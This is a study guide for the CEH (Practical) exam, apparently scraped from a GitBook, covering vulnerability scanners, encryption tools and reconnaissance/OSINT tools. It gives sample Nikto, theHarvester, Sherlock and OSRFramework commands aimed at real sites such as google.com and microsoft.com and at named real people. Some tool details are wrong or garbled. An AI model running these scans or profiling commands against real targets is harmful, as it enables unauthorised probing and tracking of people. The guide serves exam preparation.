# Table of Contents - [Certified Ethical Hacker (C|EH)(Practical) | Book of Guru HariHaraun](#certified-ethical-hacker-c-eh-practical-book-of-guru-hariharaun) - [About the Author | Book of Guru HariHaraun](#about-the-author-book-of-guru-hariharaun) - [Vulnerability Analysis | Book of Guru HariHaraun](#vulnerability-analysis-book-of-guru-hariharaun) - [Cryptography | Book of Guru HariHaraun](#cryptography-book-of-guru-hariharaun) - [Reconnaissance (Footprinting) | Book of Guru HariHaraun](#reconnaissance-footprinting-book-of-guru-hariharaun) - [Enumeration | Book of Guru HariHaraun](#enumeration-book-of-guru-hariharaun) - [Sniffing | Book of Guru HariHaraun](#sniffing-book-of-guru-hariharaun) - [Steganography | Book of Guru HariHaraun](#steganography-book-of-guru-hariharaun) - [SQL Injection | Book of Guru HariHaraun](#sql-injection-book-of-guru-hariharaun) - [Scanning Networks | Book of Guru HariHaraun](#scanning-networks-book-of-guru-hariharaun) - [System Hacking | Book of Guru HariHaraun](#system-hacking-book-of-guru-hariharaun) - [The Final Note | Book of Guru HariHaraun](#the-final-note-book-of-guru-hariharaun) - [Unknown](#unknown) - [Unknown](#unknown) - [Cloud Computing | Book of Guru HariHaraun](#cloud-computing-book-of-guru-hariharaun) - [Hacking Web Applications & Servers | Book of Guru HariHaraun](#hacking-web-applications-servers-book-of-guru-hariharaun) - [Unknown](#unknown) - [Certified Ethical Hacker (C|EH)(Practical) | Book of Guru HariHaraun](#certified-ethical-hacker-c-eh-practical-book-of-guru-hariharaun) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) --- # Certified Ethical Hacker (C|EH)(Practical) | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical.md) . ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FfRxKHeGTbcuZFYTmOoyD%252FCEH-Practical-Logo.gif%3Falt%3Dmedia%26token%3De2a20500-7cbc-4820-841b-dac1de57e2a8&width=768&dpr=3&quality=100&sign=87840d16&sv=2) Logo of Certified Ethical Hacker (Practical) | C|EH (Practical) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#introduction) Introduction ----------------------------------------------------------------------------------------------------------------- **Hey there!👋🏻** Welcome to my notes If you are here then you are probably to pass your **Certified Ethical Hacker (Practical)** exam or to get to know about the exam. So this book guides you with all the tools, tricks procedures, notes. I used it in my preparation and during my exam. **Disclaimer:** You can't 100% relay this note for your exam preparation. Since I do have experience with penetration testing I might have skipped a few steps. I tried almost to add all the tools and steps in layman terms, so please get used to it and always google the stuff. Use these notes as your escape mechanism before your exam. All the tools which have mentioned in this guide may not be safe to use since some of the tools are not been maintained by the team. If any issues happen for you or for your computer, I'm not responsible. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#my-write-up) My Write-up --------------------------------------------------------------------------------------------------------------- You can read my blog on [**how I cracked CEH (Practical) with a full score on my first attempt****.**](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) Since I wrote a blog on Medium, I'm not duplicating all my content here on this page, also, it may affect the SEO rank of my website. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=4c6031fc&sv=2)How I passed CEH (Practical) in my first attempt by Guru HariHaraunMedium](https://thegurusec.medium.com/how-i-passed-ceh-practical-in-my-first-attempt-647926a3a0ac) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#page-of-content) Page of Content ----------------------------------------------------------------------------------------------------------------------- [Reconnaissance (Footprinting)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting) [Scanning Networks](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks) [Enumeration](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration) [Vulnerability Analysis](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis) [System Hacking](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking) [Steganography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography) [Sniffing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing) [SQL Injection](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sql-injection) [Hacking Web Applications & Servers](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers) [Cloud Computing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing) [Cryptography](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography) [The Final Note](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#showcase) Showcase --------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#certificate) Certificate: ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F9R5g2Wtbk22CwknJCgnx%252FECC-CEHPractical-Certificate.png%3Falt%3Dmedia%26token%3D0f85b185-a197-49a3-9d6e-295a362fbb95&width=768&dpr=3&quality=100&sign=4fe9288b&sv=2) Certificate of Achievement - **Certified Ethical Hacker (Practical)** ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#digital-badge) Digital Badge You can verify my Digital Badge for authenticity here on the ASPEN portal. [Verify Badge | ASPENaspen.eccouncil.org](https://aspen.eccouncil.org/VerifyBadge?a=BBDTKAK7dcB7IqnCSdTJc3kMsy5qYBLPzNgp9mAL4mM%3D&type=certification) Digital Badge of Guru HariHaraun [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#support-me) Support Me ------------------------------------------------------------------------------------------------------------- #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/#hi-again-so-i-put-much-effort-into-writing-certified-ethical-hacker-practical-notes-since-they-are-n) Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fcdn.buymeacoffee.com%2Fstatic%2Fprod%2F12.3.2%2Fbuild%2Fassets%2Fapple-icon-180x180-912350ec.png&width=20&dpr=3&quality=100&sign=6c0fd007&sv=2)Guru HariHaraunBuy Me a Coffee](https://www.buymeacoffee.com/guruhariharaun) Support me here by buying me a coffee 😁🥰 [PreviousAbout the Author](https://book.thegurusec.com/) [NextReconnaissance (Footprinting)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting) Last updated 4 years ago --- # About the Author | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/about-the-author.md) . [](https://book.thegurusec.com/#introduction-about-me) Introduction About Me --------------------------------------------------------------------------------- Hey There!👋🏻 I'm [**Guru HariHaraun.**](https://thegurusec.com/) Information Security Professional Student and Certified Ethical Hacker with 3+ years of research experience in Penetration Testing(Red Team), withholding a Bachelor of Engineering degree focused in Computer Science. Also, I am a Cloud Engineering Aspirant, a Full-Stack Developer, and an SEO Strategist. [](https://book.thegurusec.com/#about-this-book) About This Book --------------------------------------------------------------------- This is my book where I share and document all my write-ups, which might help others in the information security community. As everyone knows, contributing to the community gives you knowledge and power! 🔥and I go it with all grant😎 [](https://book.thegurusec.com/#contact-me) Contact Me ----------------------------------------------------------- Platform Links **Web** [**https://thegurusec.com**](https://thegurusec.com/) **Linkedin** [**https://www.linkedin.com/in/guru-hariharaun**](https://www.linkedin.com/in/guru-hariharaun) **Medium** [**https://thegurusec.medium.com/**](https://thegurusec.medium.com/) **Github** [**https://github.com/guruhariharaun**](https://github.com/guruhariharaun) **Twitter** [**https://twitter.com/thegurusec**](https://twitter.com/thegurusec.com) **Email** [**mail@thegurusec.com**](mailto:mail@) [](https://book.thegurusec.com/#support-me) Support Me ----------------------------------------------------------- #### [](https://book.thegurusec.com/#hi-again-so-i-put-much-effort-into-doing-work-for-these-books-since-they-are-not-going-to-pay-me-but) Hi Again! So I put much effort into doing work for these books since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fcdn.buymeacoffee.com%2Fstatic%2Fprod%2F12.3.2%2Fbuild%2Fassets%2Fapple-icon-180x180-912350ec.png&width=20&dpr=3&quality=100&sign=6c0fd007&sv=2)Guru HariHaraunBuy Me a Coffee](https://www.buymeacoffee.com/guruhariharaun) [NextCertified Ethical Hacker (C|EH)(Practical)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical) Last updated 4 years ago --- # Vulnerability Analysis | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#introduction) Introduction --------------------------------------------------------------------------------------------------------------------------------------- A vulnerability assessment is a systematic review of security weaknesses in an information system. It evaluates if the system is susceptible to any known vulnerabilities, assigns severity levels to those vulnerabilities, and recommends remediation or mitigation, if and whenever needed. Examples of threats that can be prevented by vulnerability assessment include: 1. SQL injection, XSS, and other code injection attacks. 2. Escalation of privileges due to faulty authentication mechanisms. 3. Insecure defaults: software that ships with insecure settings, such as a guessable admin password. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#list-of-vulnerability-analysis-and-assessment-tools) List of Vulnerability Analysis and Assessment Tools --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#openvas) OpenVAS OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and authenticated testing, various high-level and low-level internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test. The scanner obtains the tests for detecting vulnerabilities from a feed that has a long history and daily updates. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.openvas.org%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=a99e45ec&sv=2)OPENVAS - Open Vulnerability Assessment Scannerwww.openvas.org](https://www.openvas.org/) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#nessus) Nessus Nessus is **a network security scanner**. It utilizes plug-ins, which are separate files, to handle the vulnerability checks. This makes it easy to install plug-ins and to see which plug-ins are installed to make sure that you are current. Nessus uses a server-client architecture. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.tenable.com%2Fthemes%2Fcustom%2Ftenable%2Fimages-new%2Ffavicons%2Fapple-touch-icon-180x180.png&width=20&dpr=3&quality=100&sign=3d068394&sv=2)Nessus Vulnerability Scanner: Network Security SolutionTenable®](https://www.tenable.com/products/nessus) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#gfi-languard) GFI LanGuard GFI LanGuard allows **you to scan, detect, assess and rectify security vulnerabilities in your network** and secure it with minimal administrative effort. It gives you a complete picture of your network setup, which helps you maintain a secure network faster and more effectively. [https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languardwww.gfi.com](https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#nikto) Nikto Nikto is an Open Source ([GPL](http://www.gnu.org/licenses/licenses.html#GPL) ) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.kali.org%2Fimages%2Ffavicon.png&width=20&dpr=3&quality=100&sign=cb792676&sv=2)nikto | Kali Linux ToolsKali Linux](https://www.kali.org/tools/nikto) #### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis#example-usage-of-nikto) Example usage of Nikto Copy nikto -h www.google.com -Tuning x nikto -h www.google.com -Cgidirs all nikto -h www.google.com -o nikto_scan_results -F txt [PreviousEnumeration](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration) [NextSystem Hacking](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/system-hacking) Last updated 4 years ago --- # Cryptography | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#introduction) Introduction ----------------------------------------------------------------------------------------------------------------------------- Cryptography is the science of protecting information by transforming it into a secure format. This process, called encryption, has been used for centuries to prevent handwritten messages from being read by unintended recipients. Today, cryptography is used to protect digital data. It is a division of computer science that focuses on transforming data into formats that cannot be recognized by unauthorized users. An example of basic cryptography is an encrypted message in which letters are replaced with other characters. To decode the encrypted contents, you would need a grid or table that defines how the letters are transposed. For example, the translation grid below could be used to decode **"aHR0cHM6Ly90aGVndXJ1c2VjLmNvbS8"** **as** **"**[**https://thegurusec.com**](https://thegurusec.com/) **"**. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#tools) Tools --------------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#calculate-one-way-hashes-using-hashclac) Calculate One-way Hashes using HashClac * You may use this tool to calculate the **MD5 hashes** [https://www.slavasoft.com/hashcalcwww.slavasoft.com](https://www.slavasoft.com/hashcalc) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#calculate-md5-hashes-using-md5-calculator) Calculate MD5 Hashes using MD5 Calculator * Use this tool to compare the hashes with other hashes [MD5 Calculatorwww.md5calculator.com](http://www.md5calculator.com/) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#calculate-md5-hashes-for-files-using-hashmyfiles) Calculate MD5 hashes for files using HashMyFiles HashMyFiles is a small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.nirsoft.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=2deb1d9a&sv=2)HashMyFiles: Calculate MD5/SHA1/CRC32 hash of filesNirSoft](https://www.nirsoft.net/utils/hash_my_files.html) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#perform-file-and-text-message-encryption-using-cryptoforge) Perform File and Text Message Encryption using CryptoForge ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.cryptoforge.com%2Fimages%2Ficon48x48.png&width=20&dpr=3&quality=100&sign=ebcb9c9&sv=2)CryptoForge Encryption Softwarewww.cryptoforge.com](https://www.cryptoforge.com/) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#perform-file-encryption-using-advanced-encryption-package) Perform File Encryption using Advanced Encryption Package [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.aeppro.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=42393f52&sv=2)File Encryption Softwarewww.aeppro.com](http://www.aeppro.com/) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#encrypt-and-decrypt-messages-using-bctext-encoder) Encrypt and Decrypt messages using BCText Encoder [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fjetico.com%2Fwp-content%2Fuploads%2F2024%2F09%2Ffavicon-1.png&width=20&dpr=3&quality=100&sign=6ce7abb8&sv=2)Encrypt Text for Free with BCTextEncoder - JeticoJetico](https://www.jetico.com/free-security-tools/encrypt-text-bctextencoder) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#perform-disk-encryption-using-veracrypt) Perform Disk Encryption Using VeraCrypt VeraCrypt is an open-source utility for on-the-fly encryption. The software can create a virtual encrypted disk that works just like a regular disk but within a file. It can also encrypt a partition or the entire storage device with pre-boot authentication. VeraCrypt is a fork of the discontinued TrueCrypt project * **Creating an encrypted VeraCrypt volume File** * Open the application and click “Create Volume”. * tap on “Create an Encrypted File Container”. * Select a path where the volume has to be saved. * Now, mention the volume size. * Set a password for the encrypted volume file. * For file system format we can set as “FAT“ and cluster as “Default”. * **Mounting the Encrypted file into a Volume** * Select any volume of your choice. * Select the VeraCrypt volume created before to be added. * Select Mount and it may prompt for a password. * **Uploading Files into VeraCrypt Virtual Encrypted Volume** * Create/Copy/Move the files into the Volume which you choose for mounting. * Paste all your confidential files inside that virtual volume. * Once completed, open the VeraCrypt application and then press “Dismount”. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fveracrypt.io%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=7eefb57b&sv=2)VeraCrypt - Free Open source disk encryption with strong security for the Paranoidwww.veracrypt.fr](https://www.veracrypt.fr/en/Home.html) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#bitlocker) Bitlocker BitLocker Drive Encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers. BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later. The TPM is a hardware component installed in many newer computers by the computer manufacturers. It works with BitLocker to help protect user data and to ensure that a computer has not been tampered with while the system was offline. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Flearn.microsoft.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c8bd4d70&sv=2)BitLocker OverviewMicrosoftLearn](https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview) Official Link of Microsoft ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#rohos-disk-encryption) Rohos Disk Encryption [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.rohos.com%2F1%2Fwp-content%2Fuploads%2F2017%2F11%2Fgreen-key.png&width=20&dpr=3&quality=100&sign=46d0d9e2&sv=2)Rohos Disk EncryptionRohos](https://www.rohos.com/products/rohos-disk-encryption) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography#cryptool) Cryptool CrypTool is an open-source project that is a free e-learning software for illustrating cryptographic and cryptanalytic concepts. According to "Hakin9", CrypTool is worldwide the most widespread e-learning software in the field of cryptology. CrypTool implements more than **400 algorithms.** [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.cryptool.org%2Fmedia%2Fwebsite%2Ffavicons%2Ffavicon_ctp.ico&width=20&dpr=3&quality=100&sign=df9a3ddf&sv=2)Homepage – CrypToolwww.cryptool.org](https://www.cryptool.org/en) I strongly recommend you learn all these tools. At least Go through the tools. [PreviousCloud Computing](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing) [NextThe Final Note](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/the-final-note) Last updated 4 years ago --- # Reconnaissance (Footprinting) | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#information-gathering-using-google-dorks) Information Gathering using Google Dorks ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes i the configuration and computer code that websites are using. Google dorking could also be used for OSINT. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.exploit-db.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=6301c671&sv=2)OffSec’s Exploit Database Archivewww.exploit-db.com](https://www.exploit-db.com/google-hacking-database) Exploit DB - Google Hacking Database 60KB [GoogleHackingCheatSheet.pdf](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FGBkjosMI7ZDN8pxo7v8v%2FGoogleHackingCheatSheet.pdf?alt=media&token=dfa3b255-9804-4f55-82ab-18e26d731218) PDF Download[Open](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2FGBkjosMI7ZDN8pxo7v8v%2FGoogleHackingCheatSheet.pdf?alt=media&token=dfa3b255-9804-4f55-82ab-18e26d731218) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#netcraft-and-peekyou) Netcraft and Peekyou ------------------------------------------------------------------------------------------------------------------------------------------------------------ * [https://www.netcraft.com](https://www.netcraft.com/) to find the information about the websites * [www.peekyou.com](http://www.peekyou.com/) to find the information about people who live in the USA [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#harvesting-email-using-theharvester) Harvesting Email using theHarvester ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ theHarvester is a very simple to use, yet powerful and effective tool designed to be used in the early stages of a penetration test or red team engagement. Use it for open-source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet. The tool gathers emails, names, subdomains, IPs and URLs using multiple public data sources. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - laramies/theHarvester: E-mails, subdomains and names Harvester - OSINTGitHub](https://github.com/laramies/theHarvester) Copy theharvester -d microsoft.com -l 200 -b baidu [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#sherlock) Sherlock ------------------------------------------------------------------------------------------------------------------------------------ * Sherlock is a tool used to Gather information and hunts down social media accounts by username across social networks about the users. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=e9cb4944&sv=2)GitHub - sherlock-project/sherlock: Hunt down social media accounts by username across social networksGitHub](https://github.com/sherlock-project/sherlock) Copy python3 sherlock.py satoshi nakamoto [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#ping) Ping ---------------------------------------------------------------------------------------------------------------------------- Ping is a computer network administration software utility used to test the reachability of a host on an Internet Protocol network. It is available for virtually all operating systems that have networking capability, including most embedded network administration software Copy ping www.google.com -f -l 1500 -i 3 -f = Fragment the packets -l = Size of bytes -i = Number of packets The maximum size of the frame is **1472** [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#web-data-extractor) Web Data Extractor -------------------------------------------------------------------------------------------------------------------------------------------------------- * Web Data Extractor is a Windows Tool * The tool is used to crawl website content like: * Meta Tags * Emails * Phones * Etc... [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.atom.com%2Fassets%2Fimages%2Fatom-favicon.png&width=20&dpr=3&quality=100&sign=b14feb77&sv=2)WebExtractor is for sale at Atom.com!squadhelp](http://www.webextractor.com/) Official website of the tool ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252FMvbwN16HCxzkG7ZEkE2R%252Fimage.png%3Falt%3Dmedia%26token%3D028467e1-d226-4a92-bd15-74246b04180f&width=768&dpr=3&quality=100&sign=c133be98&sv=2) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#httrack) HTTrack ---------------------------------------------------------------------------------------------------------------------------------- * HTTrack is a tool used to mirror a website and use it in offline [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.httrack.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=969da246&sv=2)HTTrack Website Copier - Free Software Offline Browser (GNU GPL)www.httrack.com](https://www.httrack.com/) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#cwel) Cwel ---------------------------------------------------------------------------------------------------------------------------- * Cwel is a tool used to create a wordlist from a specific website Copy cewl -d -w save_wordlist.txt 2 -m 5 www.example.com [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#email-tracker-pro) Email Tracker Pro ------------------------------------------------------------------------------------------------------------------------------------------------------ * Email Tracker Pro is used to track and check the Email Headers. [http://www.emailtrackerpro.com/download.htmlwww.emailtrackerpro.com](http://www.emailtrackerpro.com/download.html) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#whois-lookup-using-domain-tools) Whois Lookup using Domain Tools ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * [https://whois.domaintools.com](https://whois.domaintools.com/) is a tool used to lookup the details of a particular domain. * WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system but is also used for a wider range of other information. [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwhois.domaintools.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c8a9c9cb&sv=2)Whois Lookup, Domain Availability & IP Search - DomainToolswhois.domaintools.com](https://whois.domaintools.com/) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#dns-footprinting) DNS Footprinting ---------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#nslookup) nslookup * nslookup is a network administration command-line tool for querying the Domain Name System to obtain the mapping between a domain name and IP address r other DNS records. ![](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2F146382273-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FTnYLydS0JgZzHeOY4n38%252Fuploads%252F8zTggFbwIARSfgYs31Vt%252Fimage.png%3Falt%3Dmedia%26token%3D204f9e85-2525-4d98-af20-b2c2dafdd62f&width=768&dpr=3&quality=100&sign=b8ef6397&sv=2) ### [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#dnsrecon) DNSrecon **DNSRecon** is a free and open-source tool or script that is available on GitHub. Dnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language. You must have python language installed in your kali Linux operating system in order to use the script. Copy dnsrecon -r 192.168.64.0-192.168.64.225 [![Logo](https://book.thegurusec.com/~gitbook/image?url=https%3A%2F%2Fwww.geeksforgeeks.org%2Fwp-content%2Fuploads%2Fgfg_200X200.png&width=20&dpr=3&quality=100&sign=1e216795&sv=2)DNSRecon – A powerful DNS enumeration script - GeeksforGeeksGeeksforGeeks](https://www.geeksforgeeks.org/dnsrecon-a-powerful-dns-enumeration-script) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#traceroute) TraceRoute ---------------------------------------------------------------------------------------------------------------------------------------- * Traceroute is used to find the path IP to reach the website. * In computing, traceroute and tracert are computer network diagnostic commands for displaying possible routes and measuring transit delays of packets across an Internet Protocol network. [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#path-analyzer-pro) Path Analyzer Pro ------------------------------------------------------------------------------------------------------------------------------------------------------ * Path Analyzer Pro is a tool used to track the Path and it is a GUI windows application [https://www.pathanalyzer.comwww.pathanalyzer.com](https://www.pathanalyzer.com/) [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/reconnaissance-footprinting#other-tools) Other Tools ------------------------------------------------------------------------------------------------------------------------------------------ * Recon-ng * Maltego * OSRFramework Copy OSRFramework Tools usufy.py -n Mark Zuckerberg -p twitter facebook youtube domainfy.py -n eccouncil -t all (Gather all the registered domains) searchfy.py (Gathers info of user on Social networking page) mailfy.py (Gathers info about email accounts) phonefy.py (Gathers the series of phones) * FOCA (Best tool to footprint the whole Web server **Must check**) * Billcypher is a tool used to track down [PreviousCertified Ethical Hacker (C|EH)(Practical)](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical) [NextScanning Networks](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/scanning-networks) Last updated 4 years ago --- # Enumeration | Book of Guru HariHaraun For the complete documentation index, see [llms.txt](https://book.thegurusec.com/llms.txt) . This page is also available as [Markdown](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration.md) . [](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/enumeration#introduction) Introduction 